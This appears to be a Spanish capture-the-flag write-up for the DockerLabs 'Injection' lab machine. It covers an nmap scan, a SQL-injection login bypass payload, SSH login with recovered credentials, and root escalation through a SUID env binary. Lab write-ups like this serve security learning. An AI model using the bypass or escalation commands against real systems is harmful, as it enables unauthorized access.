maciferna
  • 🖥️Whoami
  • 📚Writeups
    • BugBountyLabs
      • Corsy
    • DockerLabs
      • 0xc0ffee
      • 404-Not-Found
      • Allien
      • Anonymouspingu
      • Apolos
      • Asucar
      • Backend
      • BadPlugin
      • Balulero
      • Borazuwarahctf
      • Bruteshock
      • Buffered
      • Candy
      • Chmod-4755
      • Corruptress
      • Cracker
      • Crackoff
      • Dance-Samba
      • Darkweb
      • Debugme
      • Devil
      • Devtools
      • Eclipse
      • Express
      • File
      • Findyourstyle
      • Flow
      • Forgotten_Portal
      • Gallery
      • Hackmedaddy
      • Hidden
      • Inj3ct0rss
      • Injection
      • Insanity
      • Jenkhack
      • Lfi.elf
      • Life Or Dead
      • Mapache2
      • Master
      • Machupichu
      • Mirame
      • Paradise
      • Patria Querida
      • PingPong
      • Pntopntobarra
      • Pressenter
      • Raas
      • Report
      • Reverse
      • Rubiks
      • R00tless
      • Seeker
      • Sender
      • Showtime
      • Sites
      • Smashing
      • Spain
      • Stack
      • Stellarjwt
      • Stranger
      • SubVersion
      • The Dog
      • UserSearch
      • Vulnvault
      • Vulnerame
      • Wallet
      • Winterfell
    • HackMyVM
      • Hero
      • MagiFi
    • HackTheBox
      • Puppy
    • The Hackers Labs
      • Casa Paco
      • Shadow Gate
      • Token Of Hate
    • Vulnyx
      • Lost Tape
Con tecnología de GitBook
En esta página
  • INTRUSION
  • ESCALADA DE PRIVILEGIOS
  1. Writeups
  2. DockerLabs

Injection

AnteriorInj3ct0rssSiguienteInsanity

Última actualización hace 5 meses

Maquina INJECTION de DockerLabs

Dificultad: Muy Fácil

Creador: El Pingüino de Mario

INTRUSION

Comenzamos haciendo un escaneo con nmap:

nmap -sVC 172.17.0.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 14:58 -03
Nmap scan report for 172.17.0.2
Host is up (0.00028s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 72:1f:e1:92:70:3f:21:a2:0a:c6:a6:0e:b8:a2:aa:d5 (ECDSA)
|_  256 8f:3a:cd:fc:03:26:ad:49:4a:6c:a1:89:39:f9:7c:22 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Iniciar Sesi\xC3\xB3n
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.72 seconds

Vemos que solo esta abierto el puerto 22 y 80, sabiendo esto nos iremos directo al navegador y vemos un panel de login. Luego de probar las credenciales tipias como admin:admin o root:root pero ninguna funciona, por lo que continuaremos con probar una inyeccion sql, para esto, escribiremos el usuario y junto a el 'or 1=1-- - y de contraseña lo que sea, finalmente quedaria así:

admin'or 1=1-- -

Ahora continuaremos probando el usuario "dylan" con la contraseña "KJSDFG789FGSDF78". Ya estamos dentro.

ESCALADA DE PRIVILEGIOS

Lo primero que hacemos es ejecutar sudo -l pero como no existe ejecutamos find / -perm -4000 2>/dev/null y vemos que el binario env sale como /usr/bin/env, por lo que buscamos en GTFOBins y vemos que si ejecutamos lo siguiente escalamos de privilegios a root:

/usr/bin/env /bin/bash -p

y listo, somos ROOT.

Gracias por leer.

Habiendo hecho esto logramos iniciar sesion y nos dan el siguiente mensaje:

📚
DockerLabs
root